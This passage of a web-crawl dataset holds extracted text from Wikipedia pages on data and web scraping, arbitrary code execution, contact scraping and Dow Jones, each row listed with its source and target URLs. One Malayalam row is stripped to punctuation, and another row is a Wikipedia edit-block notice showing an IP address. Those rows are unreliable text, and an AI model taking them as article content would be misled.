web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
77 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Arbitrary_code_execution | In computer security, arbitrary code execution (ACE) is an attacker's ability to run any commands or code of the attacker's choice on a target machine or in a target process. 1 An arbitrary code execution vulnerability is a security flaw in software or hardware allowing arbitrary code execution. A program that is designed to exploit such a vulnerability is called an arbitrary code execution exploit. The ability to trigger arbitrary code execution over a network (especially via a wide-area network such as the Internet) is often referred to as remote code execution (RCE or RCX). Arbitrary code execution signifies that if someone sends a specially designed set of data to a computer, they can make it do whatever they want. Even though this particular weakness may not cause actual problems in the real world, researchers have discussed whether it suggests a natural tendency for computers to have vulnerabilities that allow unauthorized code execution. 2 There are a number of classes of vulnerability that can lead to an attacker's ability to execute arbitrary commands or code. For example: Arbitrary code execution is commonly achieved through control over the instruction pointer (such as a jump or a branch) of a running process. The instruction pointer points to the next instruction in the process that will be executed. Control over the value of the instruction pointer therefore gives control over which instruction is executed next. In order to execute arbitrary code, many exploits inject code into the process (for example by sending input to it which gets stored in an input buffer in RAM) and use a vulnerability to change the instruction pointer to have it point to the injected code. The injected code will then automatically get executed. This type of attack exploits the fact that most computers (which use a Von Neumann architecture) do not make a general distinction between code and data, 7 8 so that malicious code can be camouflaged as harmless input data. Many newer CPUs have mechanisms to make this harder, such as a no-execute bit. 9 10 On its own, an arbitrary code execution exploit will give the attacker the same privileges as the target process that is vulnerable. 11 For example, if exploiting a flaw in a web browser, an attacker could act as the user, performing actions such as modifying personal computer files or accessing banking information, but would not be able to perform system-level actions (unless the user in question also had that access). To work around this, once an attacker can execute arbitrary code on a target, there is often an attempt at a privilege escalation exploit in order to gain additional control. This may involve the kernel itself or an account such as Administrator, SYSTEM, or root. With or without this enhanced control, exploits have the potential to do severe damage or turn the computer into a zombie—but privilege escalation helps with hiding the attack from the legitimate administrator of the system. Retrogaming hobbyists have managed to find vulnerabilities in classic video games that allow them to execute arbitrary code, usually using a precise sequence of button inputs in a tool-assisted superplay to cause a buffer overflow, allowing them to write to protected memory. At Awesome Games Done Quick 2014, a group of speedrunning enthusiasts managed to code and run versions of the games Pong and Snake in a copy of Super Mario World 12 by utilizing an out-of-bounds read of a function pointer that points to a user controlled buffer to execute arbitrary code. On June 12, 2018, Bosnian security researcher Jean-Yves Avenard of Mozilla discovered an ACE vulnerability in Windows 10. 13 On May 1, 2018, a security researcher discovered an ACE vulnerability in the 7 Zip file archiver. 14 PHP has been the subject of numerous ACE vulnerabilities. 15 16 17 On December 9, 2021, a RCE vulnerability called "Log4Shell" was discovered in popular logging framework Log4j, affecting many services including iCloud, Minecraft: Java Edition and Steam, and characterized as "the single biggest, most critical vulnerability of the last decade". 18 19 |
78 | https://en.wikipedia.org/wiki/Data_scraping | https://ml.wikipedia.org/wiki/%E0%B4%A1%E0%B4%BE%E0%B4%B1%E0%B5%8D%E0%B4%B1_%E0%B4%B8%E0%B5%8D%E0%B4%95%E0%B5%8D%E0%B4%B0%E0%B4%BE%E0%B4%AA%E0%B5%8D%E0%B4%AA%E0%B4%BF%E0%B4%82%E0%B4%97%E0%B5%8D | . 1 , , , . . , . 2 , , . , ( , , ). ( ), , , , . . , , , . ( , " ) 3 , , " . , . , . , , . " " 3270s , , . 4 , . , . , . , , , " " . (bidirectional) . . |
79 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Special:EditPage/Template:Information_security | You do not have permission to edit this page, for the following reasons: Submit an edit request The IP address or range 180.190.0.0 16 has been blocked by Stwalkerster for the following reason(s): Editing from this range has been disabled (blocked) in response to abuse. A range may be shared by many users and innocent users may be affected; if you believe that you are not the person this block is intended for, please follow the instructions below: If you have an account: Please log in to edit. In rare cases, in response to serious abuse, logged-in editing may also be disabled. If you still cannot edit, place unblock on your talk page and make reference to this message. You may wish to ping the blocking administrator or email them via the "email this user" function. If you do not have an account: Registered users are still able to edit. If you cannot create an account from this or another network, you may request that volunteers create your username for you. Please follow the instructions at Wikipedia:Request an account to request an account under your preferred username. It may take some time to process your request. Administrators: Please consult the blocking administrator before altering or lifting this block, and consider consulting with a CheckUser before granting an IP block exemption to an editor using this range. Note that large or hard (logged-in editing blocked) rangeblocks are usually only made in response to serious abuse, and the blocking admin may have information about this block which is essential to reviewing any unblock request. This block will expire on 09:06, 22 May 2032. Your current IP address is 180.190.75.212. Even when blocked, you will usually still be able to edit your user talk page, as well as email administrators and other editors. For information on how to proceed, please read the FAQ for blocked users and the guideline on block appeals. The guide to appealing blocks may also be helpful. Other useful links: Blocking policy Help:I have been blocked This block affects editing on all Wikimedia wikis. The IP address or range 180.190.0.0 16 has been globally blocked by for the following reason(s): Long-term abuse: If you are affected by this block, please message us: request This block will expire on 17:48, 21 December 2024. Your current IP address is 180.190.75.212. Even while globally blocked, you will usually still be able to edit pages on Meta-Wiki. If you believe you were blocked by mistake, you can find additional information and instructions in the No open proxies global policy. Otherwise, to discuss the block please post a request for review on Meta-Wiki. You could also send an email to the stewards VRT queue at stewards wikimedia.org including all above details. Other useful links: Global blocks Help:I have been blocked Pages transcluded onto the current version of this page (help): Return to Template:Information security. |
80 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Contact_scraping | In online advertising, contact scraping is the practice of obtaining access to a customer's e-mail account in order to retrieve contact information that is then used for marketing purposes. The New York Times refers to the practices of Tagged, MyLife and desktopdating.net as "contact scraping". 1 Several commercial packages are available that implement contact scraping for their customers, including ViralInviter, TrafficXplode, and TheTsunamiEffect. 2 Contact scraping is one of the applications of web scraping, and the example of email scraping tools include Uipath, Import.io, and Screen Scraper. The alternative web scraping tools include UzunExt, R functions, and Python Beautiful Soup. The legal issues of contact scraping is under the legality of web scraping. Following web scraping tools can be used as alternatives for contact scraping: In the United States, there exists three most commonly legal claims related to web scraping: compilation copyright infringement, violation of the Computer Fraud and Abuse Act (CFAA), and electronic trespass to chattel claims. For example, the users of "scraping tools" may violate the electronic trespass to chattel claims. 6 One of the well-known cases is Intel Corp. v. Hamidi, in which the US court decided that the computer context was not included in the common law trespass claims. 7 8 However, the three legal claims have been changed doctrinally, and it is uncertain whether the claims will still exist in the future. 6 9 For instance, the applicability of the CFAA has been narrowed due to the technical similarities between web scraping and web browsing. 10 In the case of EF Cultural Travel BV v. Zefer Corp., the court declined to apply CFAA since EF failed to meet the standard for "damage". 11 By the Article 14 of the EU's General Data Protection Regulation (GDPR), data controllers are obligated to inform individuals before processing personal data. 12 In the case of Bisnode vs. Polish Supervisory Authority, Bisnode obtained personal data from the government public register of business activity, and the data were used for business purpose. However, Bisnode only obtained email addresses for some of the people, so the mail notifications were only sent to those individuals. Instead of directly informing other people, Bisnode simply posted a notice on its website, and thus it failed to comply with the GDPR's Article 14 obligations. 13 14 In Australia, address harvesting software and harvested address lists must not be supplied, acquired, or used under the Spam Act 2003. The Spam Act also requires all marketing emails to be sent with the consent of the recipients, and all emails must include an opt-out facility. 15 The company behind the GraysOnline shopping websites was fined after sending emails that breached the Spam Act. GraysOnline sent messages without an option for recipients to opt-out of receiving further emails, and it sent emails to people who had previously withdrawn their consent from receiving Grays' emails. 16 17 Under the Cybersecurity Law of the People's Republic of China, web crawling of publicly available information is regarded as legal, but it would be illegal to obtain nonpublic, sensitive personal information without consent. 18 On November 24, 2017, three people were convicted of the crime of illegally scraping information system data stored on the server of Beijing ByteDance Networking Technology Co., Ltd. 19 |
81 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Dow_Jones_%26_Company | Dow Jones Company, Inc. (also known simply as Dow Jones) is an American publishing firm owned by News Corp and led by CEO Almar Latour. 4 The company publishes The Wall Street Journal, Barron's, MarketWatch, Mansion Global, Financial News and Private Equity News. It published the Dow Jones Industrial Average (DJIA) from 1882 until 2010, when News Corp then sold 90% ownership of the Dow Jones stock market indices business to CME Group; News Corp sold CME its remaining 10% in 2013. The company was founded in 1882 by three reporters: Charles Dow, Edward Jones, and Charles Bergstresser. Charles Dow was widely known for his ability to break down and convey what was often considered very convoluted financial information and news to the general public this is one of the reasons why Dow Jones Company is well known for their publications and transferring of important and sometimes difficult to understand financial information to people across the globe. Nevertheless, the three reporters were joined in control of the organization by Thomas F. Woodlock. 5 Dow Jones was acquired in 1902 by Clarence Barron, the leading financial journalist of the day, after the death of co-founder Charles Dow. 6 Upon Barron's death in 1928, control of the company passed to his stepdaughters Jane and Martha Bancroft. The company was led by the Bancroft family, which effectively controlled 64% of all voting stock, until 2007 when an extended takeover battle saw News Corporation acquire the business. The company then became a subsidiary of News Corporation. 7 It was reported on August 1, 2007, that the bid had been successful after an extended period of uncertainty about shareholder agreement, with the transaction finalized on December 13, 2007. 8 9 10 It was worth US$5 billion or $60 a share, giving News Corp control of The Wall Street Journal and ending the Bancroft family's 105 years of ownership. 11 The company was best known for the publication of the Dow Jones Industrial Average and related market statistics, Dow Jones Newswire, and a number of financial publications. In 2010 the Dow Jones Indexes subsidiary was sold to the CME Group and the company focused on financial news publications, including its flagship publication The Wall Street Journal and providing financial news and information tools to financial companies. 12 In 2005, together with FTSE, Dow Jones launched the Industry Classification Benchmark, a taxonomy used to segregate markets into sectors. In April 2020, Dow Jones CEO William Lewis announced he would be stepping down from his position after nearly six years in the role. 13 On May 7, 2020 News Corp announced that Almar Latour would assume the CEO role on May 15, 2020. 14 In 2021, Dow Jones acquired OPIS and Base Chemicals from IHS Market for $1.4 billion dollars. 15 16 Its flagship publication, The Wall Street Journal, is a daily newspaper in print and online covering business, financial national and international news and issues around the globe. It began publishing on July 8, 1889. There are 12 versions of the Journal in nine languages, including English, Chinese, Japanese, German, Spanish, Portuguese, Malay, Turkish and Korean. The Journal has won 35 Pulitzer Prizes for outstanding journalism. 17 Other consumer-oriented publications of Dow Jones include Barron's Magazine, a weekly overview of the world economy and markets, MarketWatch, an online financial news site, and Investor's Business Daily, a newspaper and website covering the stock market, international business, finance and economics. Financial News 18 provides news on investment banking, securities, and asset management. BigCharts, 19 provided by MarketWatch's Virtual Stock Exchange Games, 20 includes stock charts, screeners, interactive charting, and research tools. Professor Journal 21 is a "Journal" in education program for professors to integrate into curriculum. In 2017, Dow Jones launched Moneyish, a lifestyle and personal finance website aimed at millennial readers. 22 Dow Jones also published Heat Street, an online news and opinion website launched in February 2016 that was later folded into MarketWatch. 23 The monthly journal Far Eastern Economic Review closed in September 2009. Dow Jones serves corporate markets and financial markets clients with financial news and information products and services. Dow Jones owns more than 20 products that combine content and technology to help drive decisions, which include: Dow Jones Newswires is the real-time financial news organization founded in 1882, its primary competitors are Bloomberg L.P. and Thomson Reuters. The company reports more than 600,000 subscribers including brokers, traders, analysts, world leaders, and finance officials and fund managers as of July 2011. In 2009 Dow Jones Ventures launched FINS.com, a standalone resource for financial professionals with information about finance careers and the finance industry. In 2012, the site was acquired by Dice.com. In broadcasting, Dow Jones provides news content to CNBC in the U.S. It produced two shows for commercial radio, The Wall Street Journal Report on the Wall Street Journal Radio Network and The Dow Jones Report. The network was shut down in 2014. Dow Jones also launched WSJ Live 29 an interactive video website that provides live and on demand videos from The Wall Street Journal Video Network. Programs included "News Hub", "MoneyBeat", and "Lunch Break" among others. WSJ Live was shut down in 2017. In February 2010, Dow Jones sold a 90% stake in its Index business for $607.5 million to Chicago-based CME Group, which owns the Chicago Mercantile Exchange. 30 A few of the most widely used included: In July 2012, Dow Jones Company and CME Group contributed the Dow Jones Indices to the formation of the S P Dow Jones Indices joint venture, with McGraw Hill's Standard and Poor's (S P) subsidiary holding 73.0%, the CME Group holding 24.4%, and Dow Jones Company holding an indirect 2.6% ownership interest in the joint venture. 31 In April 2013, CME Group purchased the Dow Jones Company interest in the S P Dow Jones Indices joint venture for $80.0 million, increasing CME Group's interest to 27.0% and removing Dow Jones Company from all involvement with its namesake indices. 32 In March 2017, Dow Jones and NewsPicks Inc., a Japanese firm that develops and operates a business news platform of the same name, established a joint venture called NewsPicks USA, LLC. 33 The joint venture is headed by CEO Ken Breen, who is currently the Senior Vice President, Commercial, for the Dow Jones Media Group, together with Chairman Yusuke Umeda, who is also the Director of NewsPicks Inc. 34 33 35 The joint venture launched the English version of the NewsPicks platform for the US market on November 13, 2017. Similar to the original Japanese edition, the US edition of NewsPicks combines business news from sources like The Wall Street Journal, Bloomberg, and Reuters with social networking features, such as comments on news articles from top-ranked business professionals from around the world ("ProPickers"). 36 The platform currently has a smartphone app for the iPhone with plans for release on Android in the future. 37 The venture was dissolved in October 2018 with the Japanese parent company retaining full ownership. 38 The company's foundation was laid by Charles Dow, Edward Jones and Charles Bergstresser who, over two decades, conceived and promoted the three products which define Dow Jones and financial journalism: The Wall Street Journal, Dow Jones Newswires and the Dow Jones Industrial Average. 6 Dow Jones was acquired in 1902 by the leading financial journalist of the day, Clarence Barron. 6 In 2007, Dow Jones was acquired by News Corp., a leading global media company. 6 The Bancroft family and heirs of Clarence W. Barron effectively controlled the company's class B shares, each with a voting power of ten regular shares, prior to its sale to News Corp. At one time, they controlled 64% of Dow Jones voting stock. 39 Currently, Dow Jones is owned by Rupert Murdoch, owner of News Corp and several other major media companies. On May 1, 2007, Dow Jones released a statement confirming that News Corporation, led by Rupert Murdoch, had made an unsolicited offer of $60 per share, or $5 billion, for Dow Jones. 40 Stock was briefly halted for a pending press release. The halt lasted under 10 minutes while CNBC was receiving data. It was suggested that the buyout offer was related to Murdoch's new cable business news channel Fox Business, which launched in 2007, and that the Dow Jones brand would bring instant credibility to the project. 41 On June 6, 2007, Brian Tierney, CEO and founder of Philadelphia Media Holdings, which then owned The Philadelphia Inquirer, Philadelphia Daily News and Philly.com, went public in an article on Philly.com expressing interest in "joining with outside partners to buy Dow Jones. Tierney said, "We would participate as Philadelphia Media Holdings, along with other investors. We wouldn't do it alone. 42 In June, MySpace co-founder Brad Greenspan put forth a bid to buy 25% of Dow Jones for $60 a share, the same price per share as News Corporation's bid, giving the existing shareholders a $1.25 billion cash infusion while maintaining overall ownership of the company. 43 On July 17, 2007, The Wall Street Journal, a unit of Dow Jones, reported that the company and News Corporation had agreed in principle on a US$5 billion takeover, that the offer would be put to the full Dow Jones board on the same evening in New York, and that the offer valued the company at 70% more than the company's market value. 44 Our strategy centers around leaving the print publications of Dow Jones intact to continue serving as the gold standard of financial reporting, and creating additional earnings streams through digital media initiatives that can produce a stock price above 100 dollars a share, For too long, Dow Jones has limited its focus to the world of print media and allowed other, less established entities to generate millions of dollars in profits by developing financial reporting franchises on the Internet and cable television. The time has come for Dow Jones to break out of its slumber and extend its dominance into the lucrative arena of digital media. Upon investigating suspicious share price movements in the run-up to the announcement, the United States Securities and Exchange Commission alleged that board member Sir David Li, one of Hong Kong's most prominent businessmen, had informed his close friend and business associate Michael Leung of the impending offer. Leung acted on this information by telling his daughter and son-in-law, who reaped a US$8.2 million profit from an insider trading transaction. 46 Prior to its sale to News Corp, the last members of the board of directors of the company were Christopher Bancroft, Lewis B. Campbell, Michael Elefante, John Engler, Harvey Golub, Leslie Hill, Irvine Hockaday, Peter Kann, David Li, M. Peter McPherson (chairman), Frank Newman, James Ottaway, Elizabeth Steele, and William Steere. citation needed |
82 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#Vertical_aggregation | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with 